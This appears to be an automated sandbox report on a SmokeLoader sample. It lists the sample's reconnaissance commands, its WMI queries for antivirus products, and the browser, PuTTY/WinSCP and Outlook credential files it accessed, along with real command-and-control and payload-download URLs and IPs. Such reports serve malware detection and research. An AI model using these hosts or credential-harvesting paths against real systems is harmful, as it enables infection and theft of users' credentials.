                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv Jump to behavior
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000002.00000000.2124953816.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.2123559301.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032C55EB cpuid 9_2_032C55EB
                Source: C:\Users\user\AppData\Local\Temp\B575.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB879224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,8_2_00007FF7CB879224
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03272198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,9_2_03272198
                Source: C:\Users\user\AppData\Local\Temp\B575.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Modifies the windows firewall
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: B575.exe, 00000008.00000003.3228352555.000002EC777F5000.00000004.00000020.00020000.00000000.sdmp, B575.exe, 00000008.00000002.4536563179.000002EC777F9000.00000004.00000020.00020000.00000000.sdmp, B575.exe, 00000008.00000003.2966897326.000002EC777E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

                Stealing of Sensitive Information

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
                Source: Yara matchFile source: 6.2.E647.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.E647.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.uejbbri.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.E647.exe.2610000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.uejbbri.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.uejbbri.24a0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
                Source: Yara matchFile source: 6.2.E647.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.E647.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.uejbbri.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.E647.exe.2610000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.uejbbri.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.uejbbri.24a0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		2
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts522
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		3
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		1
                Credentials in Registry                		249
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                Command and Scripting Interpreter                		Login HookLogin Hook1
                Software Packing                		NTDS871
                Security Software Discovery                		Distributed Component Object Model11
                Input Capture                		115
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets34
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion                		Cached Domain Credentials4
                Process Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Hidden Files and Directories                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518333 Sample: KTh1gQlT9a.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 55 nwgrus.ru 2->55 57 calvinandhalls.com 2->57 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 7 other signatures 2->65 8 KTh1gQlT9a.exe 2->8         started        11 esjbbri 2->11         started        13 uejbbri 2->13         started        15 msiexec.exe 2->15         started        signatures3 process4 signatures5 81 Detected unpacking (changes PE section rights) 8->81 83 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->83 85 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->85 101 3 other signatures 8->101 17 explorer.exe 94 9 8->17 injected 22 cmd.exe 1 8->22         started        87 Antivirus detection for dropped file 11->87 89 Multi AV Scanner detection for dropped file 11->89 91 Machine Learning detection for dropped file 11->91 93 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->93 95 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 13->95 97 Maps a DLL or memory area into another process 13->97 99 Checks if the current machine is a virtual machine (disk enumeration) 13->99 process6 dnsIp7 49 190.98.23.157, 49756, 49758, 49760 TelecommunicationcompanySuriname-TeleSurSR Suriname 17->49 51 calvinandhalls.com 23.145.40.162, 443, 49741, 49742 SURFAIRWIRELESS-IN-01US Reserved 17->51 53 2 other IPs or domains 17->53 41 C:\Users\user\AppData\Roaming\uejbbri, PE32 17->41 dropped 43 C:\Users\user\AppData\Roaming\esjbbri, PE32 17->43 dropped 45 C:\Users\user\AppData\Local\Temp647.exe, PE32 17->45 dropped 47 2 other malicious files 17->47 dropped 67 System process connects to network (likely due to code injection or exploit) 17->67 69 Benign windows process drops PE files 17->69 71 Injects code into the Windows Explorer (explorer.exe) 17->71 79 3 other signatures 17->79 24 E647.exe 17->24         started        27 explorer.exe 20 17->27         started        29 B575.exe 2 17->29         started        37 5 other processes 17->37 73 Uses netsh to modify the Windows network and firewall settings 22->73 75 Uses ipconfig to lookup or modify the Windows network settings 22->75 77 Modifies the windows firewall 22->77 31 WMIC.exe 22->31         started        33 systeminfo.exe 22->33         started        35 conhost.exe 22->35         started        39 17 other processes 22->39 file8 signatures9 process10 signatures11 103 Antivirus detection for dropped file 24->103 105 Detected unpacking (changes PE section rights) 24->105 107 Machine Learning detection for dropped file 24->107 125 5 other signatures 24->125 109 System process connects to network (likely due to code injection or exploit) 27->109 111 Found evasive API chain (may stop execution after checking mutex) 27->111 113 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->113 115 Tries to steal Mail credentials (via file / registry access) 27->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 29->117 119 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 29->119 121 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 29->121 123 Tries to harvest and steal browser information (history, passwords, etc) 37->123

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                KTh1gQlT9a.exe34%ReversingLabs
                KTh1gQlT9a.exe100%AviraHEUR/AGEN.1310247
                KTh1gQlT9a.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\esjbbri100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\uejbbri100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Local\Temp\E647.exe100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\esjbbri100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\uejbbri100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\B575.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\E647.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\esjbbri34%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://excel.office.com0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://android.notify.windows.com/iOS0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://api.msn.com/0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
                https://powerpoint.office.comcember0%Avira URL Cloudsafe
                https://23.145.40.164/ksa9104.exe0%Avira URL Cloudsafe
                https://calvinandhalls.com/0%Avira URL Cloudsafe
                https://calvinandhalls.com/search.phpMozilla/5.00%Avira URL Cloudsafe
                https://word.office.comon0%Avira URL Cloudsafe
                http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://calvinandhalls.com/earch.phpX0%Avira URL Cloudsafe
                http://unicea.ws/tmp/index.php0%Avira URL Cloudsafe
                http://nwgrus.ru/tmp/index.php100%Avira URL Cloudmalware
                https://calvinandhalls.com/search.php0%Avira URL Cloudsafe
                https://calvinandhalls.com:443/search.phpge0%Avira URL Cloudsafe
                http://tech-servers.in.net/tmp/index.php0%Avira URL Cloudsafe
                https://outlook.com0%Avira URL Cloudsafe
                https://calvinandhalls.com/search.phpx0%Avira URL Cloudsafe
                https://calvinandhalls.com/search.phpI0%Avira URL Cloudsafe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
                https://wns.windows.com/)s0%Avira URL Cloudsafe
                http://crl.v0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                calvinandhalls.com
                		23.145.40.162
                		truetrue
                  		unknown
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalse
                    		unknown
                    nwgrus.ru
                    		116.58.10.60
                    		truetrue
                      		unknown
                      fp2e7a.wpc.phicdn.net
                      		192.229.221.95
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://23.145.40.164/ksa9104.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://unicea.ws/tmp/index.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://nwgrus.ru/tmp/index.phptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://calvinandhalls.com/search.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://tech-servers.in.net/tmp/index.phptrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://calvinandhalls.com/explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://word.office.comonexplorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2129926685.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/chrome_newtabexplorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000009.00000002.2999912401.00000000035D7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://calvinandhalls.com/search.phpMozilla/5.0explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2947253493.00000000004F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4536695596.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4536019543.0000000001119000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4537067944.0000000003207000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4535707850.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2129326664.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://calvinandhalls.com/earch.phpXexplorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://excel.office.comexplorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.microexplorer.exe, 00000002.00000000.2126713671.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125996604.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2126747794.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ecosia.org/newtab/explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://outlook.comexplorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://calvinandhalls.com/search.phpxexplorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://calvinandhalls.com:443/search.phpgeexplorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2129326664.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.msn.com/explorer.exe, 00000002.00000000.2127227127.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://calvinandhalls.com/search.phpIexplorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.vexplorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        116.58.10.60
                        		nwgrus.ruPakistan
                        		17563NEXLINX-AS-APAutonomousSystemNumberforNexlinxPKtrue
                        190.98.23.157
                        		unknownSuriname
                        		27775TelecommunicationcompanySuriname-TeleSurSRtrue
                        23.145.40.164
                        		unknownReserved
                        		22631SURFAIRWIRELESS-IN-01UStrue
                        23.145.40.162
                        		calvinandhalls.comReserved
                        		22631SURFAIRWIRELESS-IN-01UStrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1518333
                        Start date and time:2024-09-25 16:00:10 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 12m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:37
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:KTh1gQlT9a.exe
                        renamed because original name is a hash value
                        Original Sample Name:6d9b8ff6442e3c42a7ad0e1238960057.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@61/15@5/4
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 140
                        • Number of non-executed functions: 84
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
